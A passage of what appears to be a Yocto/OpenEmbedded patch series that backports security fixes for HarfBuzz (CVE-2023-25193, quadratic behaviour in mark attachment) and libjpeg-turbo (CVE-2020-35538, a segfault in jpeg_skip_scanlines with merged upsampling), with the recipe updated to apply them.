108- return true;
109- }
110-
111- if (skip == matcher_t::SKIP_NO)
112- {
113- if (unsafe_from)
114- *unsafe_from = hb_max (1u, idx) - 1u;
115- return false;
116+ case MATCH:
117+ {
118+ num_items--;
119+ if (match_glyph_data) match_glyph_data++;
120+ return true;
121+ }
122+ case NOT_MATCH:
123+ {
124+ if (unsafe_from)
125+ *unsafe_from = hb_max (1u, idx) - 1u;
126+ return false;
127+ }
128+ case SKIP:
129+ continue;
130 }
131 }
132 if (unsafe_from)
133--
1342.25.1
135
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch
new file mode 100644
index 0000000000..e4ac13dbad
--- /dev/null
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch
@@ -0,0 +1,179 @@
1From 9c8e972dbecda93546038d24444d8216397d75a3 Mon Sep 17 00:00:00 2001
2From: Behdad Esfahbod <behdad@behdad.org>
3Date: Mon, 6 Feb 2023 14:51:25 -0700
4Subject: [PATCH] [GPOS] Avoid O(n^2) behavior in mark-attachment
5
6Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/8708b9e081192786c027bb7f5f23d76dbe5c19e8]
7Comment1: The Original Patch [https://github.com/harfbuzz/harfbuzz/commit/85be877925ddbf34f74a1229f3ca1716bb6170dc] causes regression and was reverted. This Patch completes the fix.
8Comment2: The Patch contained files MarkBasePosFormat1.hh and MarkLigPosFormat1.hh which were moved from hb-ot-layout-gpos-table.hh as per https://github.com/harfbuzz/harfbuzz/commit/197d9a5c994eb41c8c89b7b958b26b1eacfeeb00
9CVE: CVE-2023-25193
10Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
11Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
12
13---
14 src/hb-ot-layout-gpos-table.hh | 103 +++++++++++++++++++++++----------
15 src/hb-ot-layout-gsubgpos.hh | 5 +-
16 2 files changed, 78 insertions(+), 30 deletions(-)
17
18diff --git a/src/hb-ot-layout-gpos-table.hh b/src/hb-ot-layout-gpos-table.hh
19index 024312d..db5f9ae 100644
20--- a/src/hb-ot-layout-gpos-table.hh
21+++ b/src/hb-ot-layout-gpos-table.hh
22@@ -1458,6 +1458,25 @@ struct MarkBasePosFormat1
23
24 const Coverage &get_coverage () const { return this+markCoverage; }
25
26+ static inline bool accept (hb_buffer_t *buffer, unsigned idx)
27+ {
28+ /* We only want to attach to the first of a MultipleSubst sequence.
29+ * https://github.com/harfbuzz/harfbuzz/issues/740
30+ * Reject others...
31+ * ...but stop if we find a mark in the MultipleSubst sequence:
32+ * https://github.com/harfbuzz/harfbuzz/issues/1020 */
33+ return !_hb_glyph_info_multiplied (&buffer->info[idx]) ||
34+ 0 == _hb_glyph_info_get_lig_comp (&buffer->info[idx]) ||
35+ (idx == 0 ||
36+ _hb_glyph_info_is_mark (&buffer->info[idx - 1]) ||
37+ !_hb_glyph_info_multiplied (&buffer->info[idx - 1]) ||
38+ _hb_glyph_info_get_lig_id (&buffer->info[idx]) !=
39+ _hb_glyph_info_get_lig_id (&buffer->info[idx - 1]) ||
40+ _hb_glyph_info_get_lig_comp (&buffer->info[idx]) !=
41+ _hb_glyph_info_get_lig_comp (&buffer->info[idx - 1]) + 1
42+ );
43+ }
44+
45 bool apply (hb_ot_apply_context_t *c) const
46 {
47 TRACE_APPLY (this);
48@@ -1465,37 +1484,46 @@ struct MarkBasePosFormat1
49 unsigned int mark_index = (this+markCoverage).get_coverage (buffer->cur().codepoint);
50 if (likely (mark_index == NOT_COVERED)) return_trace (false);
51
52- /* Now we search backwards for a non-mark glyph */
53+ /* Now we search backwards for a non-mark glyph.
54+ * We don't use skippy_iter.prev() to avoid O(n^2) behavior. */
55+
56 hb_ot_apply_context_t::skipping_iterator_t &skippy_iter = c->iter_input;
57- skippy_iter.reset (buffer->idx, 1);
58 skippy_iter.set_lookup_props (LookupFlag::IgnoreMarks);
59- do {
60- if (!skippy_iter.prev ()) return_trace (false);
61- /* We only want to attach to the first of a MultipleSubst sequence.
62- * https://github.com/harfbuzz/harfbuzz/issues/740
63- * Reject others...
64- * ...but stop if we find a mark in the MultipleSubst sequence:
65- * https://github.com/harfbuzz/harfbuzz/issues/1020 */
66- if (!_hb_glyph_info_multiplied (&buffer->info[skippy_iter.idx]) ||
67- 0 == _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx]) ||
68- (skippy_iter.idx == 0 ||
69- _hb_glyph_info_is_mark (&buffer->info[skippy_iter.idx - 1]) ||
70- _hb_glyph_info_get_lig_id (&buffer->info[skippy_iter.idx]) !=
71- _hb_glyph_info_get_lig_id (&buffer->info[skippy_iter.idx - 1]) ||
72- _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx]) !=
73- _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx - 1]) + 1
74- ))
75- break;
76- skippy_iter.reject ();
77- } while (true);
78+ unsigned j;
79+ for (j = buffer->idx; j > c->last_base_until; j--)
80+ {
81+ auto match = skippy_iter.match (buffer->info[j - 1]);
82+ if (match == skippy_iter.MATCH)
83+ {
84+ if (!accept (buffer, j - 1))
85+ match = skippy_iter.SKIP;
86+ }
87+ if (match == skippy_iter.MATCH)
88+ {
89+ c->last_base = (signed) j - 1;
90+ break;
91+ }
92+ }
93+ c->last_base_until = buffer->idx;
94+ if (c->last_base == -1)
95+ {
96+ buffer->unsafe_to_concat_from_outbuffer (0, buffer->idx + 1);
97+ return_trace (false);
98+ }
99+
100+ unsigned idx = (unsigned) c->last_base;
101
102 /* Checking that matched glyph is actually a base glyph by GDEF is too strong; disabled */
103- //if (!_hb_glyph_info_is_base_glyph (&buffer->info[skippy_iter.idx])) { return_trace (false); }
104+ //if (!_hb_glyph_info_is_base_glyph (&buffer->info[idx])) { return_trace (false); }
105
106- unsigned int base_index = (this+baseCoverage).get_coverage (buffer->info[skippy_iter.idx].codepoint);
107- if (base_index == NOT_COVERED) return_trace (false);
108+ unsigned int base_index = (this+baseCoverage).get_coverage (buffer->info[idx].codepoint);
109+ if (base_index == NOT_COVERED)
110+ {
111+ buffer->unsafe_to_concat_from_outbuffer (idx, buffer->idx + 1);
112+ return_trace (false);
113+ }
114
115- return_trace ((this+markArray).apply (c, mark_index, base_index, this+baseArray, classCount, skippy_iter.idx));
116+ return_trace ((this+markArray).apply (c, mark_index, base_index, this+baseArray, classCount, idx));
117 }
118
119 bool subset (hb_subset_context_t *c) const
120@@ -1587,15 +1615,32 @@ struct MarkLigPosFormat1
121 if (likely (mark_index == NOT_COVERED)) return_trace (false);
122
123 /* Now we search backwards for a non-mark glyph */
124+
125 hb_ot_apply_context_t::skipping_iterator_t &skippy_iter = c->iter_input;
126- skippy_iter.reset (buffer->idx, 1);
127 skippy_iter.set_lookup_props (LookupFlag::IgnoreMarks);
128- if (!skippy_iter.prev ()) return_trace (false);
129+
130+ unsigned j;
131+ for (j = buffer->idx; j > c->last_base_until; j--)
132+ {
133+ auto match = skippy_iter.match (buffer->info[j - 1]);
134+ if (match == skippy_iter.MATCH)
135+ {
136+ c->last_base = (signed) j - 1;
137+ break;
138+ }
139+ }
140+ c->last_base_until = buffer->idx;
141+ if (c->last_base == -1)
142+ {
143+ buffer->unsafe_to_concat_from_outbuffer (0, buffer->idx + 1);
144+ return_trace (false);
145+ }
146+
147+ j = (unsigned) c->last_base;
148
149 /* Checking that matched glyph is actually a ligature by GDEF is too strong; disabled */
150- //if (!_hb_glyph_info_is_ligature (&buffer->info[skippy_iter.idx])) { return_trace (false); }
151+ //if (!_hb_glyph_info_is_ligature (&buffer->info[idx])) { return_trace (false); }
152
153- unsigned int j = skippy_iter.idx;
154 unsigned int lig_index = (this+ligatureCoverage).get_coverage (buffer->info[j].codepoint);
155 if (lig_index == NOT_COVERED) return_trace (false);
156
157diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
158index 5a7e564..437123c 100644
159--- a/src/hb-ot-layout-gsubgpos.hh
160+++ b/src/hb-ot-layout-gsubgpos.hh
161@@ -503,6 +503,9 @@ struct hb_ot_apply_context_t :
162 uint32_t random_state;
163
164
165+ signed last_base = -1; // GPOS uses
166+ unsigned last_base_until = 0; // GPOS uses
167+
168 hb_ot_apply_context_t (unsigned int table_index_,
169 hb_font_t *font_,
170 hb_buffer_t *buffer_) :
171@@ -536,7 +539,7 @@ struct hb_ot_apply_context_t :
172 iter_context.init (this, true);
173 }
174
175- void set_lookup_mask (hb_mask_t mask) { lookup_mask = mask; init_iters (); }
176+ void set_lookup_mask (hb_mask_t mask) { lookup_mask = mask; last_base = -1; last_base_until = 0; init_iters (); }
177 void set_auto_zwj (bool auto_zwj_) { auto_zwj = auto_zwj_; init_iters (); }
178 void set_auto_zwnj (bool auto_zwnj_) { auto_zwnj = auto_zwnj_; init_iters (); }
179 void set_random (bool random_) { random = random_; }
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb b/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
index ee08c12bee..0cfe01f1e5 100644
--- a/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
@@ -7,7 +7,10 @@ LICENSE = "MIT"
7LIC_FILES_CHKSUM = "file://COPYING;md5=e11f5c3149cdec4bb309babb020b32b9 \ 7LIC_FILES_CHKSUM = "file://COPYING;md5=e11f5c3149cdec4bb309babb020b32b9 \
8 file://src/hb-ucd.cc;beginline=1;endline=15;md5=29d4dcb6410429195df67efe3382d8bc" 8 file://src/hb-ucd.cc;beginline=1;endline=15;md5=29d4dcb6410429195df67efe3382d8bc"
9 9
10SRC_URI = "http://www.freedesktop.org/software/harfbuzz/release/${BP}.tar.xz" 10SRC_URI = "http://www.freedesktop.org/software/harfbuzz/release/${BP}.tar.xz \
11 file://CVE-2023-25193-pre0.patch \
12 file://CVE-2023-25193-pre1.patch \
13 file://CVE-2023-25193.patch"
11SRC_URI[md5sum] = "2b3a4dfdb3e5e50055f941978944da9f" 14SRC_URI[md5sum] = "2b3a4dfdb3e5e50055f941978944da9f"
12SRC_URI[sha256sum] = "9413b8d96132d699687ef914ebb8c50440efc87b3f775d25856d7ec347c03c12" 15SRC_URI[sha256sum] = "9413b8d96132d699687ef914ebb8c50440efc87b3f775d25856d7ec347c03c12"
13 16
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch
new file mode 100644
index 0000000000..8a52ed01e9
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch
@@ -0,0 +1,457 @@
1From 9120a247436e84c0b4eea828cb11e8f665fcde30 Mon Sep 17 00:00:00 2001
2From: DRC <information@libjpeg-turbo.org>
3Date: Thu, 23 Jul 2020 21:24:38 -0500
4Subject: [PATCH] Fix jpeg_skip_scanlines() segfault w/merged upsamp
5
6The additional segfault mentioned in #244 was due to the fact that
7the merged upsamplers use a different private structure than the
8non-merged upsamplers. jpeg_skip_scanlines() was assuming the latter, so
9when merged upsampling was enabled, jpeg_skip_scanlines() clobbered one
10of the IDCT method pointers in the merged upsampler's private structure.
11
12For reasons unknown, the test image in #441 did not encounter this
13segfault (too small?), but it encountered an issue similar to the one
14fixed in 5bc43c7821df982f65aa1c738f67fbf7cba8bd69, whereby it was
15necessary to set up a dummy postprocessing function in
16read_and_discard_scanlines() when merged upsampling was enabled.
17Failing to do so caused either a segfault in merged_2v_upsample() (due
18to a NULL pointer being passed to jcopy_sample_rows()) or an error
19("Corrupt JPEG data: premature end of data segment"), depending on the
20number of scanlines skipped and whether the first scanline skipped was
21an odd- or even-numbered row.
22
23Fixes #441
24Fixes #244 (for real this time)
25
26Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9120a247436e84c0b4eea828cb11e8f665fcde30]
27CVE: CVE-2020-35538
28Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
29---
30 ChangeLog.md | 7 +++++
31 jdapistd.c | 72 ++++++++++++++++++++++++++++++++++++++++++++++------
32 jdmerge.c | 46 +++++++--------------------------
33 jdmerge.h | 47 ++++++++++++++++++++++++++++++++++
34 jdmrg565.c | 10 ++++----
35 jdmrgext.c | 6 ++---
36 6 files changed, 135 insertions(+), 53 deletions(-)
37 create mode 100644 jdmerge.h
38
39diff --git a/ChangeLog.md b/ChangeLog.md
40index 2ebfe71..19d18fa 100644
41--- a/ChangeLog.md
42+++ b/ChangeLog.md
43@@ -54,6 +54,13 @@ a 16-bit binary PGM file into an RGB image buffer.
44 generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
45 file into an extended RGB image buffer.
46
47+2. Fixed segfaults or "Corrupt JPEG data: premature end of data segment" errors
48+in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or 4:2:0 JPEG
49+images using the merged (non-fancy) upsampling algorithms (that is, when
50+setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a similar fix,
51+but it did not cover all cases.
52+
53+
54 2.0.3
55 =====
56
57diff --git a/jdapistd.c b/jdapistd.c
58index 2c808fa..91da642 100644
59--- a/jdapistd.c
60+++ b/jdapistd.c
61@@ -4,7 +4,7 @@
62 * This file was part of the Independent JPEG Group's software:
63 * Copyright (C) 1994-1996, Thomas G. Lane.
64 * libjpeg-turbo Modifications:
65- * Copyright (C) 2010, 2015-2018, D. R. Commander.
66+ * Copyright (C) 2010, 2015-2018, 2020, D. R. Commander.
67 * Copyright (C) 2015, Google, Inc.
68 * For conditions of distribution and use, see the accompanying README.ijg
69 * file.
70@@ -21,6 +21,8 @@
71 #include "jinclude.h"
72 #include "jdmainct.h"
73 #include "jdcoefct.h"
74+#include "jdmaster.h"
75+#include "jdmerge.h"
76 #include "jdsample.h"
77 #include "jmemsys.h"
78
79@@ -304,6 +306,16 @@ noop_quantize(j_decompress_ptr cinfo, JSAMPARRAY input_buf,
80 }
81
82
83+/* Dummy postprocessing function used by jpeg_skip_scanlines() */
84+LOCAL(void)
85+noop_post_process (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
86+ JDIMENSION *in_row_group_ctr,
87+ JDIMENSION in_row_groups_avail, JSAMPARRAY output_buf,
88+ JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
89+{
90+}
91+
92+
93 /*
94 * In some cases, it is best to call jpeg_read_scanlines() and discard the
95 * output, rather than skipping the scanlines, because this allows us to
96@@ -316,11 +328,17 @@ LOCAL(void)
97 read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
98 {
99 JDIMENSION n;
100+ my_master_ptr master = (my_master_ptr)cinfo->master;
101 void (*color_convert) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
102 JDIMENSION input_row, JSAMPARRAY output_buf,
103 int num_rows) = NULL;
104 void (*color_quantize) (j_decompress_ptr cinfo, JSAMPARRAY input_buf,
105 JSAMPARRAY output_buf, int num_rows) = NULL;
106+ void (*post_process_data) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
107+ JDIMENSION *in_row_group_ctr,
108+ JDIMENSION in_row_groups_avail,
109+ JSAMPARRAY output_buf, JDIMENSION *out_row_ctr,
110+ JDIMENSION out_rows_avail) = NULL;
111
112 if (cinfo->cconvert && cinfo->cconvert->color_convert) {
113 color_convert = cinfo->cconvert->color_convert;
114@@ -332,6 +350,12 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
115 cinfo->cquantize->color_quantize = noop_quantize;
116 }
117
118+ if (master->using_merged_upsample && cinfo->post &&
119+ cinfo->post->post_process_data) {
120+ post_process_data = cinfo->post->post_process_data;
121+ cinfo->post->post_process_data = noop_post_process;
122+ }
123+
124 for (n = 0; n < num_lines; n++)
125 jpeg_read_scanlines(cinfo, NULL, 1);
126
127@@ -340,6 +364,9 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
128
129 if (color_quantize)
130 cinfo->cquantize->color_quantize = color_quantize;
131+
132+ if (post_process_data)
133+ cinfo->post->post_process_data = post_process_data;
134 }
135
136
137@@ -382,7 +409,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
138 {
139 my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
140 my_coef_ptr coef = (my_coef_ptr)cinfo->coef;
141- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
142+ my_master_ptr master = (my_master_ptr)cinfo->master;
143 JDIMENSION i, x;
144 int y;
145 JDIMENSION lines_per_iMCU_row, lines_left_in_iMCU_row, lines_after_iMCU_row;
146@@ -445,8 +472,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
147 main_ptr->buffer_full = FALSE;
148 main_ptr->rowgroup_ctr = 0;
149 main_ptr->context_state = CTX_PREPARE_FOR_IMCU;
150- upsample->next_row_out = cinfo->max_v_samp_factor;
151- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
152+ if (master->using_merged_upsample) {
153+ my_merged_upsample_ptr upsample =
154+ (my_merged_upsample_ptr)cinfo->upsample;
155+ upsample->spare_full = FALSE;
156+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
157+ } else {
158+ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
159+ upsample->next_row_out = cinfo->max_v_samp_factor;
160+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
161+ }
162 }
163
164 /* Skipping is much simpler when context rows are not required. */
165@@ -458,8 +493,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
166 cinfo->output_scanline += lines_left_in_iMCU_row;
167 main_ptr->buffer_full = FALSE;
168 main_ptr->rowgroup_ctr = 0;
169- upsample->next_row_out = cinfo->max_v_samp_factor;
170- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
171+ if (master->using_merged_upsample) {
172+ my_merged_upsample_ptr upsample =
173+ (my_merged_upsample_ptr)cinfo->upsample;
174+ upsample->spare_full = FALSE;
175+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
176+ } else {
177+ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
178+ upsample->next_row_out = cinfo->max_v_samp_factor;
179+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
180+ }
181 }
182 }
183
184@@ -494,7 +537,14 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
185 cinfo->output_iMCU_row += lines_to_skip / lines_per_iMCU_row;
186 increment_simple_rowgroup_ctr(cinfo, lines_to_read);
187 }
188- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
189+ if (master->using_merged_upsample) {
190+ my_merged_upsample_ptr upsample =
191+ (my_merged_upsample_ptr)cinfo->upsample;
192+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
193+ } else {
194+ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
195+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
196+ }
197 return num_lines;
198 }
199
200@@ -535,7 +585,13 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
201 * bit odd, since "rows_to_go" seems to be redundantly keeping track of
202 * output_scanline.
203 */
204- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
205+ if (master->using_merged_upsample) {
206+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
207+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
208+ } else {
209+ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
210+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
211+ }
212
213 /* Always skip the requested number of lines. */
214 return num_lines;
215diff --git a/jdmerge.c b/jdmerge.c
216index dff5a35..833ad67 100644
217--- a/jdmerge.c
218+++ b/jdmerge.c
219@@ -5,7 +5,7 @@
220 * Copyright (C) 1994-1996, Thomas G. Lane.
221 * libjpeg-turbo Modifications:
222 * Copyright 2009 Pierre Ossman <ossman@cendio.se> for Cendio AB
223- * Copyright (C) 2009, 2011, 2014-2015, D. R. Commander.
224+ * Copyright (C) 2009, 2011, 2014-2015, 2020, D. R. Commander.
225 * Copyright (C) 2013, Linaro Limited.
226 * For conditions of distribution and use, see the accompanying README.ijg
227 * file.
228@@ -40,41 +40,13 @@
229 #define JPEG_INTERNALS
230 #include "jinclude.h"
231 #include "jpeglib.h"
232+#include "jdmerge.h"
233 #include "jsimd.h"
234 #include "jconfigint.h"
235
236 #ifdef UPSAMPLE_MERGING_SUPPORTED
237
238
239-/* Private subobject */
240-
241-typedef struct {
242- struct jpeg_upsampler pub; /* public fields */
243-
244- /* Pointer to routine to do actual upsampling/conversion of one row group */
245- void (*upmethod) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
246- JDIMENSION in_row_group_ctr, JSAMPARRAY output_buf);
247-
248- /* Private state for YCC->RGB conversion */
249- int *Cr_r_tab; /* => table for Cr to R conversion */
250- int *Cb_b_tab; /* => table for Cb to B conversion */
251- JLONG *Cr_g_tab; /* => table for Cr to G conversion */
252- JLONG *Cb_g_tab; /* => table for Cb to G conversion */
253-
254- /* For 2:1 vertical sampling, we produce two output rows at a time.
255- * We need a "spare" row buffer to hold the second output row if the
256- * application provides just a one-row buffer; we also use the spare
257- * to discard the dummy last row if the image height is odd.
258- */
259- JSAMPROW spare_row;
260- boolean spare_full; /* T if spare buffer is occupied */
261-
262- JDIMENSION out_row_width; /* samples per output row */
263- JDIMENSION rows_to_go; /* counts rows remaining in image */
264-} my_upsampler;
265-
266-typedef my_upsampler *my_upsample_ptr;
267-
268 #define SCALEBITS 16 /* speediest right-shift on some machines */
269 #define ONE_HALF ((JLONG)1 << (SCALEBITS - 1))
270 #define FIX(x) ((JLONG)((x) * (1L << SCALEBITS) + 0.5))
271@@ -189,7 +161,7 @@ typedef my_upsampler *my_upsample_ptr;
272 LOCAL(void)
273 build_ycc_rgb_table(j_decompress_ptr cinfo)
274 {
275- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
276+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
277 int i;
278 JLONG x;
279 SHIFT_TEMPS
280@@ -232,7 +204,7 @@ build_ycc_rgb_table(j_decompress_ptr cinfo)
281 METHODDEF(void)
282 start_pass_merged_upsample(j_decompress_ptr cinfo)
283 {
284- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
285+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
286
287 /* Mark the spare buffer empty */
288 upsample->spare_full = FALSE;
289@@ -254,7 +226,7 @@ merged_2v_upsample(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
290 JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
291 /* 2:1 vertical sampling case: may need a spare row. */
292 {
293- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
294+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
295 JSAMPROW work_ptrs[2];
296 JDIMENSION num_rows; /* number of rows returned to caller */
297
298@@ -305,7 +277,7 @@ merged_1v_upsample(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
299 JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
300 /* 1:1 vertical sampling case: much easier, never need a spare row. */
301 {
302- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
303+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
304
305 /* Just do the upsampling. */
306 (*upsample->upmethod) (cinfo, input_buf, *in_row_group_ctr,
307@@ -566,11 +538,11 @@ h2v2_merged_upsample_565D(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
308 GLOBAL(void)
309 jinit_merged_upsampler(j_decompress_ptr cinfo)
310 {
311- my_upsample_ptr upsample;
312+ my_merged_upsample_ptr upsample;
313
314- upsample = (my_upsample_ptr)
315+ upsample = (my_merged_upsample_ptr)
316 (*cinfo->mem->alloc_small) ((j_common_ptr)cinfo, JPOOL_IMAGE,
317- sizeof(my_upsampler));
318+ sizeof(my_merged_upsampler));
319 cinfo->upsample = (struct jpeg_upsampler *)upsample;
320 upsample->pub.start_pass = start_pass_merged_upsample;
321 upsample->pub.need_context_rows = FALSE;
322diff --git a/jdmerge.h b/jdmerge.h
323new file mode 100644
324index 0000000..b583396
325--- /dev/null
326+++ b/jdmerge.h
327@@ -0,0 +1,47 @@
328+/*
329+ * jdmerge.h
330+ *
331+ * This file was part of the Independent JPEG Group's software:
332+ * Copyright (C) 1994-1996, Thomas G. Lane.
333+ * libjpeg-turbo Modifications:
334+ * Copyright (C) 2020, D. R. Commander.
335+ * For conditions of distribution and use, see the accompanying README.ijg
336+ * file.
337+ */
338+
339+#define JPEG_INTERNALS
340+#include "jpeglib.h"
341+
342+#ifdef UPSAMPLE_MERGING_SUPPORTED
343+
344+
345+/* Private subobject */
346+
347+typedef struct {
348+ struct jpeg_upsampler pub; /* public fields */
349+
350+ /* Pointer to routine to do actual upsampling/conversion of one row group */
351+ void (*upmethod) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
352+ JDIMENSION in_row_group_ctr, JSAMPARRAY output_buf);
353+
354+ /* Private state for YCC->RGB conversion */
355+ int *Cr_r_tab; /* => table for Cr to R conversion */
356+ int *Cb_b_tab; /* => table for Cb to B conversion */
357+ JLONG *Cr_g_tab; /* => table for Cr to G conversion */
358+ JLONG *Cb_g_tab; /* => table for Cb to G conversion */
359+
360+ /* For 2:1 vertical sampling, we produce two output rows at a time.
361+ * We need a "spare" row buffer to hold the second output row if the
362+ * application provides just a one-row buffer; we also use the spare
363+ * to discard the dummy last row if the image height is odd.
364+ */
365+ JSAMPROW spare_row;
366+ boolean spare_full; /* T if spare buffer is occupied */
367+
368+ JDIMENSION out_row_width; /* samples per output row */
369+ JDIMENSION rows_to_go; /* counts rows remaining in image */
370+} my_merged_upsampler;
371+
372+typedef my_merged_upsampler *my_merged_upsample_ptr;
373+
374+#endif /* UPSAMPLE_MERGING_SUPPORTED */
375diff --git a/jdmrg565.c b/jdmrg565.c
376index 1b87e37..53f1e16 100644
377--- a/jdmrg565.c
378+++ b/jdmrg565.c
379@@ -5,7 +5,7 @@
380 * Copyright (C) 1994-1996, Thomas G. Lane.
381 * libjpeg-turbo Modifications:
382 * Copyright (C) 2013, Linaro Limited.
383- * Copyright (C) 2014-2015, 2018, D. R. Commander.
384+ * Copyright (C) 2014-2015, 2018, 2020, D. R. Commander.
385 * For conditions of distribution and use, see the accompanying README.ijg
386 * file.
387 *
388@@ -19,7 +19,7 @@ h2v1_merged_upsample_565_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
389 JDIMENSION in_row_group_ctr,
390 JSAMPARRAY output_buf)
391 {
392- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
393+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
394 register int y, cred, cgreen, cblue;
395 int cb, cr;
396 register JSAMPROW outptr;
397@@ -90,7 +90,7 @@ h2v1_merged_upsample_565D_internal(j_decompress_ptr cinfo,
398 JDIMENSION in_row_group_ctr,
399 JSAMPARRAY output_buf)
400 {
401- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
402+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
403 register int y, cred, cgreen, cblue;
404 int cb, cr;
405 register JSAMPROW outptr;
406@@ -163,7 +163,7 @@ h2v2_merged_upsample_565_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
407 JDIMENSION in_row_group_ctr,
408 JSAMPARRAY output_buf)
409 {
410- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
411+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
412 register int y, cred, cgreen, cblue;
413 int cb, cr;
414 register JSAMPROW outptr0, outptr1;
415@@ -259,7 +259,7 @@ h2v2_merged_upsample_565D_internal(j_decompress_ptr cinfo,
416 JDIMENSION in_row_group_ctr,
417 JSAMPARRAY output_buf)
418 {
419- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
420+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
421 register int y, cred, cgreen, cblue;
422 int cb, cr;
423 register JSAMPROW outptr0, outptr1;
424diff --git a/jdmrgext.c b/jdmrgext.c
425index b1c27df..c9a44d8 100644
426--- a/jdmrgext.c
427+++ b/jdmrgext.c
428@@ -4,7 +4,7 @@
429 * This file was part of the Independent JPEG Group's software:
430 * Copyright (C) 1994-1996, Thomas G. Lane.
431 * libjpeg-turbo Modifications:
432- * Copyright (C) 2011, 2015, D. R. Commander.
433+ * Copyright (C) 2011, 2015, 2020, D. R. Commander.
434 * For conditions of distribution and use, see the accompanying README.ijg
435 * file.
436 *
437@@ -25,7 +25,7 @@ h2v1_merged_upsample_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
438 JDIMENSION in_row_group_ctr,
439 JSAMPARRAY output_buf)
440 {
441- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
442+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
443 register int y, cred, cgreen, cblue;
444 int cb, cr;
445 register JSAMPROW outptr;
446@@ -97,7 +97,7 @@ h2v2_merged_upsample_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
447 JDIMENSION in_row_group_ctr,
448 JSAMPARRAY output_buf)
449 {
